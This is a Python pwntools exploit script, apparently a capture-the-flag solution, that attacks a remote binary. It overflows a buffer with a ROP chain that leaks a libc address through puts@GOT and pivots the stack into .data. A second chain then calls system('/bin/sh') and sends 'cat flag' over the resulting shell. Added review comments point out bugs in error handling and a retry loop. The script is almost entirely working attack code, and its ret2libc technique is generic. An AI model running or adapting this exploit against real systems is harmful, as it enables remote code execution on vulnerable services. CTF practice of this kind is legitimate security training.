#!/usr/bin/env python2
from pwn import *
import sys
# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
def fail(msg):
    """Log *msg* as an exploit failure and terminate with exit status 1.

    The message is rendered with ``str.format`` so any object is accepted.
    """
    rendered = "Exploit failed: {}".format(msg)
    log.info(rendered)
    sys.exit(1)
def success(msg):
    """Log *msg* at success level and terminate with the (non-zero) exit status 1337.

    The unusual exit code is the author's own convention for "flag found";
    callers checking for 0 on success will misread it.
    """
    rendered = "{}".format(msg)
    log.success(rendered)
    sys.exit(1337)
def main():
    """Run the two-stage exchange against the HOST:PORT given in ``sys.argv[1]``.

    Stage 1 sends a 24-byte filler followed by a chain of fixed addresses
    (the author's per-line annotations name each one), reads one line back
    and treats it as a little-endian pointer from which a libc base is
    derived with a hard-coded offset.  Stage 2 sends a second chain built on
    that base, then the line ``cat flag``, and returns the first reply line.

    Returns:
        The stripped reply line on success, or ``None`` if anything in the
        exchange raised (the handler at the bottom swallows every exception).

    NOTE(review): every address and offset here is a constant for one
    specific binary and libc build; on any other build the chain just
    misbehaves.  The ``0x40....`` gadget addresses look like a non-PIE
    target — confirm against the binary rather than assuming it.
    """
    INTRO = False
    # PORT is left as a str; whether remote() converts it is not visible here — verify.
    HOST, PORT = sys.argv[1].split(':')
    try:
        # NOTE(review): this loop never actually retries — a successful pass
        # returns from inside the first iteration, and any exception leaves
        # the loop via the handler below, so range(20) behaves like range(1).
        for i in range(20):
            io = remote(HOST, PORT)
            banner = io.recvuntil(': ')[:-8]  # read up to the prompt, drop its trailing 8 bytes
            if INTRO == False:
                print banner  # Python 2 print statement, consistent with the python2 shebang
                INTRO = True
            # Stage 1 chain: 24 bytes of filler, then the gadget/address list
            # annotated by the author (leak via puts, read the next stage
            # with gets into .data, then re-point rbp and leave/ret there).
            rop = cyclic(24)
            rop += p64(0x400783) # pop rdi ; ret
            rop += p64(0x601fc8) # puts@GOT
            rop += p64(0x400550) # puts()
            rop += p64(0x400783) # pop rdi ; ret
            rop += p64(0x602600) # .data
            rop += p64(0x400580) # gets()
            rop += p64(0x400608) # pop rbp ; ret
            rop += p64(0x6025f8) # .data
            rop += p64(0x400715) # leave ; ret
            io.sendline(rop)
            # The reply line is expected to be exactly 6 raw bytes; two NULs
            # pad it to the 8 bytes u64 needs.  A different length misparses
            # silently (u64 raises, which the bare except then hides).
            leak = io.recvline().strip()
            leak = u64(leak+'\x00\x00')
            libc = leak - 0x809c0  # hard-coded distance from the leaked entry to the libc base for the targeted build
            # log.info('leak: 0x%012x' % leak)
            # log.info('libc: 0x%012x' % libc)
            # Stage 2 chain (read by the gets() above): libc-relative addresses
            # per the author's annotations.
            rop = p64(0x400783) # pop rdi ; ret
            rop += p64(libc+0x1b3e9a) # /bin/sh
            rop += p64(libc+0x04f440) # system()
            io.sendline(rop)
            io.sendline('cat flag')
            flag = io.recvline().strip()
            return flag
    except:
        # NOTE(review): a bare except also catches KeyboardInterrupt and
        # SystemExit, and if remote() raised on the first iteration `io` is
        # unbound here, so io.close() itself raises NameError; the original
        # cause is never logged.  `except Exception as e:` plus a log line,
        # with `io` initialised to None before the loop, would fix both.
        io.close()
        return None
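if __name__ == '__main__':
    # Usage: <script> HOST:PORT — main() splits argv[1] on ':'.
    if len(sys.argv) < 2:
        fail('No target')
    flag = main()
    # main() returns None whenever its exchange raised, so guard before
    # calling a str method on the result; the original raised
    # AttributeError here instead of reporting the failure via fail().
    if flag is not None and flag.startswith("sctf{"):
        success(flag)
    fail("")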